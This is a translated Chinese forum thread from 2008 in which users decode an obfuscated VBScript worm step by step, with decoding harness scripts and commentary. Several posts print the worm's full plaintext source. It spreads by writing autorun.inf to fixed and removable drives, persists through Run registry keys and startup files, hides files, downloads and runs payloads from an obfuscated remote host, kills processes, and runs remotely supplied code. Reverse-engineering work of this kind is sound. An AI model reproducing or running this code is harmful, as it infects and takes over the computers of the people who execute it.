wr "oer",rr("oer",1)+abs(sco)

if rr("oer",1)>100 then wr "ded",date:wr "oer",0

end if

end if

end function



'Use the procedure Intercept() to replace execute()

'**************Capture the code inside the parentheses of execute(), start

Sub Intercept (code)

WScript.Echo code

OutPutFile="decode_7.txt"

Set objFSO=CreateObject("Scripting.FileSystemObject")

Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)

objTXT.Write code

objTXT.Close

Set objWSH=CreateObject("WScript.Shell")

objWSH.Run OutPutFile

WScript.Quit

End Sub

'**************Capture the code inside the parentheses of execute(), end

Copy the above code and save it as Decoding_6th.vbs, run it, and the result is stored in decode_7.txt. This time I guarantee you will see the true lie. Really, I'm not lying to you. I didn't mean to lie to you before. Don't go away. Oh no, don't look for tomatoes and eggs first. Be patient. Give me some time,I have something to say...Oh my god...【To be continued】

[ Last edited by uhnmki on 2008-1-16 at 07:28 PM ]
Recent Ratings for This Post ( 1 in total) Click for details
RaterScoreTime
knoppix7 +8 2008-01-16 20:37
Floor 19 Posted 2008-01-16 19:38 ·  中国 北京 海淀区 联通
uhnmki
初级用户
Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male
Status Offline
**** Open decode_7.txt and see if the plaintext appears:


:execute(uc(dyz)):execute(uc(zcx)):function gt():execute(uc(gtz)):end function:function ei(name,wt):execute(uc(eiz)):end function:function df(wh):execute(uc(dfz)):end function:function bf(wh,wt,da):execute(uc(bfz)):end function:function bi(wh):execute(uc(biz)):end function:function rt(wh,li):execute(uc(rtz)):end function:function wr(rna,rda):execute(uc(wrz)):end function:function rr(rna,pa):execute(uc(rrz)):end function:function ar(file,cg):execute(uc(arz)):end function:function dn(loc,web,ris,min):execute(uc(dnz)):end function:function pr(pcs,gs):execute(uc(prz)):end function:function ec(wt):execute(uc(ecz)):end function:function co(wh):execute(uc(coz)):end function:function rs(sw):execute(uc(rsz)):end function:function hi(sw):execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):execute(uc(dwz)):end function:function us(sw):execute(uc(usz)):end function:function cu():execute(uc(cuz)):end function:function km(sw):execute(uc(kmz)):end function:function cf(wh):execute(uc(cfz)):end function


Alas, it disappoints everyone again. It's a bit messy, but wait a minute, let's sort it out first to see more clearly:



execute(uc(dyz))



execute(uc(zcx))



function gt()

execute(uc(gtz))

end function



function ei(name,wt)

execute(uc(eiz))

end function



function df(wh)

execute(uc(dfz))

end function



function bf(wh,wt,da)

execute(uc(bfz))

end function



function bi(wh)

execute(uc(biz))

end function



function rt(wh,li)

execute(uc(rtz))

end function



function wr(rna,rda)

execute(uc(wrz))

end function



function rr(rna,pa)

execute(uc(rrz))

end function



function ar(file,cg)

execute(uc(arz))

end function



function dn(loc,web,ris,min)

execute(uc(dnz))

end function



function pr(pcs,gs)

execute(uc(prz))

end function



function ec(wt)

execute(uc(ecz))

end function



function co(wh)

execute(uc(coz))

end function



function rs(sw)

execute(uc(rsz))

end function



function hi(sw)

execute(uc(hiz))

end function



function gi(ids,fid,eid,fname,furl)

execute(uc(giz))

end function



function dw(pcs,fn,furl,kill)

execute(uc(dwz))

end function



function us(sw)

execute(uc(usz))

end function



function cu()

execute(uc(cuz))

end function



function km(sw)

execute(uc(kmz))

end function



function cf(wh)

execute(uc(cfz))

end function


This is almost close to uncovering the last layer. It's basically continuously substituting various variables into the uc(b) function, then decoding, generating instructions, making the main program segment and various functions needed by the main program, and then executing the decoded code. The virus is finally showing its ferocious appearance.

The uc(b) function is the key, just as we suspected earlier, it is the decoding function. Then there are many variables appearing here, which are the messy things we saw in the sixth pot earlier. Because the code here is the result of the string merging in execute() that appeared in the sixth pot last time. When execute starts to execute the code here, the variables appearing at the same time as execute are of the same status as these codes, which is equivalent to us assigning values to some variables first when writing the program, but then enclosing the entire main program segment and all function segments in execute(). This actually has no effect.

For example:


Var1="Var1 is defined in Main." ' First assign a value to the variable
Execute("MsgBox Var1") '==> MsgBox "Var1" ' Then execute the program in Execute
Execute("MsgBox uc(Var1)") '==> MsgBox uc(Var1)
Execute "Exe"&"cute("&Chr(34)&"MsgBox uc(rr(Var1) & Var2)"&Chr(34)&")"
'Equivalent to Execute ( "Execute("MsgBox uc(rr(Var1) & Var2)") "),Note "equivalent to", not directly runnable, need to consider how to handle quotes in quotes

' Imitate the Virus approach, write the function body into execute, and sell a关子, define a Var2 variable in function rr, but rr doesn't use it. Once rr is executed once, it can be used by uc(b)
Function rr(a)
Execute ("Var2="&Chr(34)&"Var2 is defined in Fuction rr. It is no use for Function rr."&Chr(34)&"&vbCrLf"&":rr=a & "&Chr(34)&"can be ued by Function rr."&Chr(34)&" & vbCrLf")
'<-- Var2="Var2 is defined in Functin rr, It is no use for Function rr" & vbCrLf
'<-- rr=a & "and can be used by Function rr."
End Function

Function uc(b)
Execute ("x="&Chr(34)&"All above can be used by Function uc."&Chr(34)&":"&"uc=b & Chr(10) & Chr(13) & x")
'<-- x="All above can be used by Function uc"
'<-- uc=b & vbCrLf & x
End Function


So if we decode each execute(uc(...)) in the Decode_7 code in turn, and substitute them into execute(uc(...)) at the corresponding positions, the final result is the encrypted plaintext, that is, the virus原体.

Next, we need to consider how to generate each segment of the program specifically, mainly the uc(b) function. Let's review the ins and outs of the uc(b) function, see the following figure:



When uc(b) first appeared, it did not explicitly contain the variable b. Through variables w, x, y, z decoding twice, by Decode_4th, the usable form of uc(b) was generated. There are not only b there, but also newly defined variables of almost c~v and undefined l. And l is assigned a value in Decode_6 later. When the program uses it for the first time, it has to be considered as an empty character. After Decode_6, when the uc(b) function is called again, remember that l should use the definition in Decode_6. There is also a rn, which is handled in the same way. Since x, y, z, w (it seems) have never been changed, the content of Decode_4 is basically unchanged. So we might as well re-construct the function uc(b) like this, pile up those variables defined in Decode_4~6 together, then take the algorithm fragment for generating the function return value uc in Decode_4, and code them together to form the plaintext form of the uc(b) function.

Using the obtained uc(b) function, substitute b one by one, and get the values of uc(b) appearing in Decode_7 one by one, like the following:


'*******Variable assignment from Decode_6
on error resume next
dfz=... ' Source of variable b
...
l=... ' Used when calculating uc
rn=... ' Used when calculating uc
...
cfz=... ' Source of variable b

'*******Variable assignment from Decode_4
c=vbcrlf:d=... ... v=...

'*******Take the program segment from Decode_4, form the function uc(b), put an interception program Intercept(code) in
execute( ... &"uc=rn+c+uc"&c&"Intercept(uc)") ' The green words are the added interception program

'*******Interception program Intercept(code), start
Sub Intercept (code)
ForAppending=8
Create=True
ASCII=0
WScript.Echo code
Set objFSO=CreateObject("Scripting.FileSystemObject")
OutPutFile="decode_8.txt"
Set objTXT=objFSO.OpenTextFile(OutPutFile,ForAppending,Create,ASCII)
objTXT.Write code & vbCrLf & "'" & String(8,"*") & vbCrLf
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
If objWSH.PopUp("是否继续执行?",0,"当心引爆病毒!",276)<>6 Then
WScript.Quit
End IF
End Sub
'*******Interception program Intercept(code), end, the result will be appended to decode_8.txt in turn

'*******Run the original decoding program and intercept
execute(uc(dyz)) ' Modify the value of b, such as dyz, zcx..., run one by one



Each time you modify execute(uc(b))'s b, save it as a vbs and run it, finally open Decode_8.txt, copy the results of each time to the corresponding positions in Decode_7, and combine them together to re-construct the entire virus原体.

I counted, there are 23 uc(b)s. You can simply repeat them one by one, I don't need to do it, because I want to generate and assemble them automatically. To be continued for what happens next.

[ Last edited by uhnmki on 2008-1-23 at 07:17 PM ]
Recent Ratings for This Post ( 1 in total) Click for details
RaterScoreTime
knoppix7 +8 2008-01-16 20:37
Floor 20 Posted 2008-01-20 03:27 ·  中国 陕西 西安 电信
slore
铂金会员
★★★★
Credits 5,212
Posts 2,478
Joined 2007-02-08 23:39
19-year member
UID 79003
Gender Male
Status Offline
### gt():
Dim d:j = "\"
tjs = rr("tjs", 1): djs = rr("djs", 1)
If Not IsNumeric(tjs) Or Not IsDate(djs) Then
wr "tjs", 1
wr "djs", Date
djs = rr("djs", 1)
End If
wr "tjs", tjs + 1
wb = pr("clsmn.exe", 1) = 1 Or pr("ap.exe", 1) = 1 Or pr("pubwin.exe", 1) = 1
If Date - CDate(djs) > 4 Then
gq = True
ws.run "net start ""task scheduler""", 0, False
End If
If (rr("tjs", 1) > 800 Or wb Or gq Or Not sys) And rr("ded", 1) <> CStr(Date) Then
id = rr("idd", 1)
If wb Then
id = 1
js = 1
cd = 0
End If
Do While cd <> "<script>"
If js = 2 Or js = 4 Then
d2 = dn(mir & til, ht + ha + ec(hd) & id, 0, 100)
cd = rt(mir & til, 1)
ElseIf js = 1 Or js = 3 Then
d1 = dn(mir & til, ht + ec(hb) + ec(hd) & id & "&v=" & ver, 0, 100)
cd = rt(mir & til, 1)
End If
js = js + 1
wz = d1 = 1 Or d2 = 1
If js > 4 Then
If wz Then gt = 1
Exit Do
End If
If wz Then er = er - 1
Loop
If ei(mir & til, 1) Then
Set r = fso.OpenTextFile(mir & til, 1)
cin = r.ReadLine
dis = r.ReadLine
dna = r.ReadLine
dfr = r.ReadLine
nve = r.ReadLine
nru = r.ReadLine
nna = r.ReadLine
nfr = r.ReadLine
tsw = r.ReadLine
tco = r.ReadLine
osw = r.ReadLine
idd = r.ReadLine
r.Close
df mir & til
If cin = "<script>" Then
wr "tjs", 1
wr "djs", Date
wr "idd", idd
wr "dna", dna
wr "tsw", tsw
wr "tco", tco
wr "osw", osw
If nve - ver >= 1 Or Not ei(dir & ve, 1) Then
dn dir & nna, ht & nfr & dfo & nna, nru, 2000
wscript.quit
End If
If dis = 1 And sys Then
If dna <> le Or Not ei(tmp & le, 1) Then
df tmp & le
dn tmp & dna, ht & dfr & dfo & dna, 1, 1000
End If
End If
End If
End If
End If
If er(1) Or wb Then gt = 1

### ei(name, wt):
Dim d:j = "\"
If fso.fileexists(name) And wt = 1 Then ei = True
If fso.folderexists(name) And wt = 2 Then ei = True

Dim d:j = "\"
ar wh, 0
If ei(wh, 1) Then fso.deletefile(wh)
If ei(wh, 2) Then fso.deletefolder(wh)

Dim d:j = "\"
df wh
Set bin = fso.createtextfile(wh, True)
bin.writeline wt
bin.Close
If da = 1 Then ar wh, 7
If Not er(0) Then bf = 1

Dim d:j = "\"
df wh
Set i = fso.createtextfile(wh, True)
h = vbCrLf
i.writeline til & h & "" & h & "open=wscript.exe .\" & vs & h & "shell\open\command=wscript.exe .\" & vs & h & "shell\open\default=1"
i.Close
ar wh, 7
If Not er(0) Then bi = 1

Dim d:j = "\"
If li < 0 Then wh = ouw
If ei(wh, 1) Then
If fso.getfile(wh).size = 0 Then
rt = 0
Else
Set r = fso.OpenTextFile(wh, 1)
Set cl = fso.OpenTextFile(wh, 1)
cl.ReadAll
tli = cl.line
cl.Close
If li > 0 And li <= tli Then
i = 0
Do While i < li
i = i + 1
If Not r.atendofstream Then
sli = r.ReadLine
Else
sli = 0
End If
Loop
rt = sli
ElseIf li <= 0 Then
rt = r.ReadAll
Else
rt = 0
End If
r.Close
End If
Else
rt = 0
End If

Dim d:j = "\"
If rda = -1 Then ws.regdelete rna Else ws.regwrite rpa & rna, rda, "REG_SZ"

Dim d:j = "\"
If pa = 1 Then rna = rpa & rna
rr = ws.regread(rna)
If er(0) Then rr = 0

Dim d:j = "\"
If ei(file, 1) Then
Set ofile = fso.getfile(file)
ofile.attributes = cg
Set ofile = Nothing
End If
If ei(file, 2) Then
Set ofile = fso.getfolder(file)
ofile.attributes = cg
Set ofile = Nothing

Dim d:j = "\"
ar loc, 0
Set xpost = CreateObject("microsoft.xmlhttp")
xpost.open "get", web, 0
xpost.send()
If min <> 0 Then
If Not er(0) Then
dn = 1
Set sget = CreateObject("adodb.stream")
sget.mode = 3
sget.Type = 1
sget.open
sget.write(xpost.responsebody)
sget.savetofile loc, 2
ar loc, 7
If ei(loc, 1) Then fsz = fso.getfile(loc).size Else fsz = 0
If fsz > min Then
If ris = 1 Then ws.run loc
Else
dn = 0
df loc
End If
End If
End If

Dim d:j = "\"
Set pl = wmi.execquery("select * from win32_process where name='" & pcs & "'")
i = 1
For Each p In pl
i = i + 1
If i > Abs(gs) Then pr = 1
If gs < 0 Then
If p.terminate = 2 And pr = 1 Then
ws.run cm & "tskill " & Left(p.name, Len(p.name) - 4), 0, False
End If
End If
Next
If er(0) Then pr = 2

Dim d:j = "\"
For i = 1 To Len(wt)
ec = ec & Chr(Asc(Mid(wt, i, 1)) - i)
Next

Dim d:j = "\"
df wh
Set vbs = fso.createtextfile(wh, True)
vbs.write ouc
vbs.Close
ar wh, 7

Dim d:j = "\"
If sw = 1 And rr(rsp & rsn, 0) <> ve Then
ws.regwrite rsp & rsn, ve, "REG_SZ"
If er(0) And Not ei(fsp, 1) Then bf fsp, wsr & " """ & ve & """", 0
ElseIf sw = -1 Then
df fsp
ElseIf sw = 0 Then
df fsp
wr rsp & rsn, -1
wr rpa, -1
End If

Dim d:j = "\"
If sw = 1 Then ws.regwrite hip, "0", "REG_DWORD"
If sw = 0 Then hi = rr(hip, 0)

Dim d:j = "\"
id = rr("idd", 1)
Do While fid <= eid
idc = idc & "," & fid
fid = fid + 1
Loop
ids = ids & idc
idss = Split(ids, ",")
For i = 0 To UBound(idss)
If id = idss(i) Then
If Not ei(tmp & fname, 1) Then
dn tmp & fname, ht & furl, 0, 2000
End If
End If
Next
If ei(tmp & fname, 1) Then ws.run tmp & fname
gi = 1

Dim d:j = "\"
If rr("ged", 1) <> fn And pr(pcs, 1) = 1 Then
If dn(tmp & fn, ht & furl, 0, 2000) = 1 Then dwc = 1
If ei(tmp & fn, 1) And dwc = 1 Then
If kill = 1 Then pr pcs, -1
ws.run tmp & fn
If Not er(0) Then
wr "ged", fn
dn 0, ht + ec(hb) + he + fn, 0, 0
If kill = 2 Then
pr pcs, -1
km 1
End If
End If
End If
dw = 1
End If
wscript.sleep 100

Dim d:j = "\"
For Each d In dc
If d.drivetype = 3 Or (d.drivetype = 1 And d <> "A:" And d <> "B:") Then
If sw = 1 Then
If ei(d & inf, 2) Then df d & inf
If ei(d & j & vs, 1) And ei(d & inf, 1) Then
If rt(d & inf, 1) <> til Then bi d & inf
Else
hi 1
bi d & inf
co d & j & vs
End If
ElseIf sw = -1 Then
df d & inf
df d & j & vs
Else
bf d & j & vs, wsr & "(left(wscript.scriptfullname,3)),3" & String(10000, "'"), 1
df d & inf
End If
End If
Next

Dim d:j = "\"
cus = rr("osw", 1) <> 4
Do
dcu = rr("tgs", 1) <> CStr(Date)
If (Second(Time) Mod 3) = 0 Then
If dcu And cus Then us 1
min = Minute(Now)
If (min Mod 2) = 0 And nn <> min And oo <> 1 Then
nn = min
oo = gt
km 0
End If
If rr("tsw", 1) = 1 Then execute(uc(rr("tco", 1)))
End If
wscript.sleep 900
If hi(0) = 1 And dcu Then
wr "tgs", Date
us = us - 1
End If
If pr("taskmgr.exe", 1) = 1 Then
ws.run "at " & Time + 0.003 & " /interactive " & ve, 0, False
wr "atd", 1
hi 1
wscript.quit
End If
Loop
Floor 21 Posted 2008-01-20 10:58 ·  中国 北京 联通
kich
中级用户
★★
Credits 397
Posts 168
Joined 2006-10-08 10:07
19-year member
UID 64934
Status Offline
Rising will report a virus:


dim d:j="\"

on error resume next

ver="9":btj=800:vs=".vbs":ve=".vbe":cm="%comspec% /c ":dfo="/u#t/":til="UT "&ver:inf="\autorun.inf"



set ws=createobject("wscript.shell")

set wmi=getobject("winmgmts:\\.\root\cimv2")

set fso=createobject("scripting.filesystemobject")

set sis=wmi.execquery("select * from win32_operatingsystem")

set dc=fso.drives

ouw=wscript.scriptfullname

win=fso.getspecialfolder(0)&j

dir=fso.getspecialfolder(1)&j

tmp=fso.getspecialfolder(2)&j

wbe=dir&"wbem\"

mir=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))

wsr="createobject(""wscript.shell"").run"

'cnp="HKLM\system\currentcontrolset\control\computername\computername\computername"

cna=rr("HKLM\system\currentcontrolset\control\computername\computername\computername",0)

if cna="" then cna=til

rpa="HKLM\software\"&cna&j

'rop="\software\microsoft\windows\currentversion\explorer\"



fsp=rr("HKLM\software\microsoft\windows\currentversion\explorer\shell folders\common startup",0)&j&vs

fap=rr("HKCU\software\microsoft\windows\currentversion\explorer\shell folders\favorites",0)&j

dap=rr("HKCU\software\microsoft\windows\currentversion\explorer\shell folders\desktop",0)&j

rsn=cna

ht=ec("ivwt?56")

ha=ec(":;9::<5kw9")

'hc="0dwuEpE"

he=ec("c"+"0dwuEpE")

rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\"

if mir=fso.getspecialfolder(1)&j then sys=true

for each si in sis

ca=si.caption

cs=si.codeset

cc=si.countrycode

os=si.oslanguage

wv=si.version

next

hip="HKCU\software\microsoft\windows\currentversion\explorer\advanced\showsuperhidden"

hb="vv1<=676x"&chr(124)&"r;"

if instr(wv,"5.2")<>0 then

hd="t"+"0dwuEpE"

elseif cc<>86 then hd="p"+hc

else hd="$"+hc:end if





for each d in dc

if mir=d&j then ws.run "explorer "&d,3,false

next

ouc=rt(ouw,-1):if cf(ouw) then msgbox("Happy Newyear!"):km 1

if sys then

hi 1

if rr("til",1)<>til then

wr "til",til

wr "tjs",btj

wr "djs",date

wr "ded",0

end if

if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0

if rr(rsp&rsn,0)=ve then rs -1

le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le

km 0

cu:er 1

wscript.sleep 1000

if rr("ded",1)<>cstr(date) then ws.run ouw

else

wscript.sleep 5000

if pr("wscript.exe",2)=2 then

if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date

end if

if pr("wscript.exe",2)=1 then wscript.quit

ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve

end if



function gt()

dim d:j="\":on error resume next

tjs=rr("tjs",1):djs=rr("djs",1):if not isnumeric(tjs) or not isdate(djs) then wr "tjs",1:wr "djs",date:djs=rr("djs",1)

wr "tjs",tjs+1:wb=pr("clsmn.exe",1)=1 or pr("ap.exe",1)=1 or pr("pubwin.exe",1)=1

if date-cdate(djs)>3 then gq=true:ws.run "net start ""task scheduler""",0,false

if (rr("tjs",1)>1000 or wb or gq or not sys) and rr("ded",1)<>cstr(date) then

id=rr("idd",1):if wb then id=1:js=1:cd=0

do while cd<>"<script>"

if js=2 or js=4 then

d2=dn(mir&til,ht+ha+ec(hd)&id,0,100):cd=rt(mir&til,1)

elseif js=1 or js=3 then d1=dn(mir&til,ht+ec(hb)+ec(hd)&id&"&v="&ver,0,100):cd=rt(mir&til,1)

end if:js=js+1:wz=d1=1 or d2=1:if js>4 then

if wz then gt=1

exit do

end if

if wz then er -1

loop

if ei(mir&til,1) then

set r=fso.opentextfile(mir&til,1)

cin=r.readline:dis=r.readline:dna=r.readline:dfr=r.readline:nve=r.readline:nru=r.readline

nna=r.readline:nfr=r.readline:tsw=r.readline:tco=r.readline:osw=r.readline:idd=r.readline

r.close:df mir&til:if cin="<script>" then

wr "tjs",1:wr "djs",date:wr "idd",idd:wr "dna",dna:wr "tsw",tsw:wr "tco",tco:wr "osw",osw

if nve-ver>=1 or not ei(dir&ve,1) then dn dir&nna,ht&nfr&dfo&nna,nru,2000:wscript.quit

if dis=1 and sys then

if dna<>le or not ei(tmp&le,1) then df tmp&le:dn tmp&dna,ht&dfr&dfo&dna,1,1000

end if

end if

end if

end if

if er(1) or wb then gt=1

end function



function ei(name,wt)

dim d:j="\":on error resume next

if fso.fileexists(name) and wt=1 then ei=true

if fso.folderexists(name) and wt=2 then ei=true

end function



function df(wh)

dim d:j="\":on error resume next

ar wh,0

if ei(wh,1) then fso.deletefile(wh)

if ei(wh,2) then fso.deletefolder(wh)

end function



function bf(wh,wt,da)

dim d:j="\":on error resume next

df wh:set bin=fso.createtextfile(wh,true):bin.writeline wt:bin.close

if da=1 then ar wh,7

if not er(0) then bf=1

end function



function bi(wh)

dim d:j="\":on error resume next

df wh:set i=fso.createtextfile(wh,true):h=vbcrlf

i.writeline til&h&""&h&"open=wscript.exe .\"&vs&h&"shell\open\command=wscript.exe .\"&vs&h&"shell\open\default=1"

i.close:ar wh,7:if not er(0) then bi=1

end function



function rt(wh,li)

dim d:j="\":on error resume next

if li<0 then wh=ouw

if ei(wh,1) then

if fso.getfile(wh).size=0 then

rt=0

else

set r=fso.opentextfile(wh,1)

set cl=fso.opentextfile(wh,1)

cl.readall

tli=cl.line

cl.close

if li>0 and li<=tli then

i=0 

do while i<li

i=i+1

if not r.atendofstream then

sli=r.readline

else

sli=0

end if

loop

rt=sli

elseif li<=0 then

rt=r.readall

else

rt=0

end if

r.close

end if

else

rt=0

end if

end function



function wr(rna,rda)

dim d:j="\":on error resume next

if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"

end function



function rr(rna,pa)

dim d:j="\":on error resume next

if pa=1 then rna=rpa&rna

rr=ws.regread(rna)

if er(0) then rr=0

end function



function ar(file,cg)

dim d:j="\":on error resume next

if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing

if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing

end function



function dn(loc,web,ris,min)

dim d:j="\":on error resume next

ar loc,0:set xpost = createobject("microsoft.xmlhttp"):xpost.open "get",web,0:xpost.send()

if min<>0 then

if not er(0) then

dn=1:set sget=createobject("adodb.stream") 

sget.mode=3:sget.type=1:sget.open():sget.write(xpost.responsebody):sget.savetofile loc,2

ar loc,7

if ei(loc,1) then fsz=fso.getfile(loc).size else fsz=0

if fsz>min then

if ris=1 then ws.run loc

else

dn=0:df loc

end if

end if

end if

end function



function pr(pcs,gs)

dim d:j="\":on error resume next

set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1

for each p in pl:i=i+1

if i>abs(gs) then pr=1

if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false

next

if er(0) then pr=2

end function



function ec(wt)

dim d:j="\":on error resume next

for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next

end function

function co(wh)

dim d:j="\":on error resume next

df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7

end function



function rs(sw)

dim d:j="\":on error resume next

if sw=1 and rr(rsp&rsn,0)<>ve then

ws.regwrite rsp&rsn,ve,"REG_SZ"

if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0

elseif sw=-1 then:df fsp

elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1

end if

end function



function hi(sw)

dim d:j="\":on error resume next

if sw=1 then ws.regwrite hip,"0","REG_DWORD"

if sw=0 then hi=rr(hip,0)

end function



function gi(ids,fid,eid,fname,furl)

dim d:j="\":on error resume next

id=rr("idd",1)

do while fid<=eid:idc=idc&","&fid:fid=fid+1:loop

ids=ids&idc:idss=split(ids,",")

for i=0 to ubound(idss)

if id=idss(i) then if not ei(tmp&fname,1) then dn tmp&fname,ht&furl,0,2000

next

if ei(tmp&fname,1) then ws.run tmp&fname

gi=1

end function



function dw(pcs,fn,furl,kill)

dim d:j="\":on error resume next

if rr("ged",1)<>fn and pr(pcs,1)=1 then

if dn(tmp&fn,ht&furl,0,2000)=1 then dwc=1

if ei(tmp&fn,1) and dwc=1 then

if kill=1 then pr pcs,-1

ws.run tmp&fn

if not er(0) then wr "ged",fn:dn 0,ht+ec(hb)+he+fn,0,0:if kill=2 then pr pcs,-1:km 1

end if

dw=1

end if

wscript.sleep 100

end function



function us(sw)

dim d:j="\":on error resume next

for each d in dc

if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then

if sw=1 then

if ei(d&inf,2) then df d&inf

if ei(d&j&vs,1) and ei(d&inf,1) then

if rt(d&inf,1)<>til then bi d&inf

else

hi 1:bi d&inf:co d&j&vs

end if

elseif sw=-1 then:df d&inf:df d&j&vs

else:bf d&j&vs,wsr&"(left(wscript.scriptfullname,3)),3"&string(10000,"'"),1:df d&inf

end if

end if

next

end function



function cu()

dim d:j="\":on error resume next

cus=rr("osw",1)<>4

do

dcu=rr("tgs",1)<>cstr(date)

if (second(time) mod 3)=0 then

if dcu and cus then us 1

min=minute(now):if (min mod 2)=0 and nn<>min and oo<>1 then nn=min:oo=gt:km 0

if rr("tsw",1)=1 then execute(uc(rr("tco",1)))

end if

wscript.sleep 900

if hi(0)=1 and dcu then wr "tgs",date:us -1

if pr("taskmgr.exe",1)=1 then:ws.run "at "&time+0.003&" /interactive "&ve,0,false:wr "atd",1:hi 1:wscript.quit

loop

end function



function km(sw)

dim d:j="\":on error resume next

if sw=1 then

rs 0:us -1:df ouw:df win&ve:df dir&ve:df wbe&ve:wscript.quit

else

rs 1

if cf(dir&ve) then co dir&ve

if cf(win&ve) then co win&ve

end if

end function



function cf(wh)

dim d:j="\":on error resume next

if rt(wh,1)<>"'"&ver then cf=true

end function









function er(sco)

if err.number<>0 or sco<0 then

err.clear

er=true

if sco<>0 and rr("ded",1)<>cstr(date) then

wr "oer",rr("oer",1)+abs(sco)

if rr("oer",1)>100 then wr "ded",date:wr "oer",0

end if

end if

end function
Floor 22 Posted 2008-01-20 12:48 ·  中国 北京 联通
knoppix7
银牌会员
★★★
Credits 1,287
Posts 634
Joined 2007-05-02 15:06
19-year member
UID 87277
Gender Male
From cmd.exe
Status Offline
BT encryption... Sweat....
LS has worked hard
Floor 23 Posted 2008-01-23 19:38 ·  中国 北京 海淀区 联通
uhnmki
初级用户
Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male
Status Offline
【Continuation Seven】Let's carry this matter through to the end. Although the viewers have all scattered and no one is reading this post, I'm writing for myself now. I use this nice page layout here, and after writing, I'll copy the web page to keep as a reference for myself. As mentioned above, I need to decode the encrypted virus and restore it to a complete program. The following is my method (there are many methods, different people have different views):


'**************The following variable assignments come from Decode_6. It's equivalent to the ciphertext.

on error resume next
dyz="ire=|9|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:gvy=|UT |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| 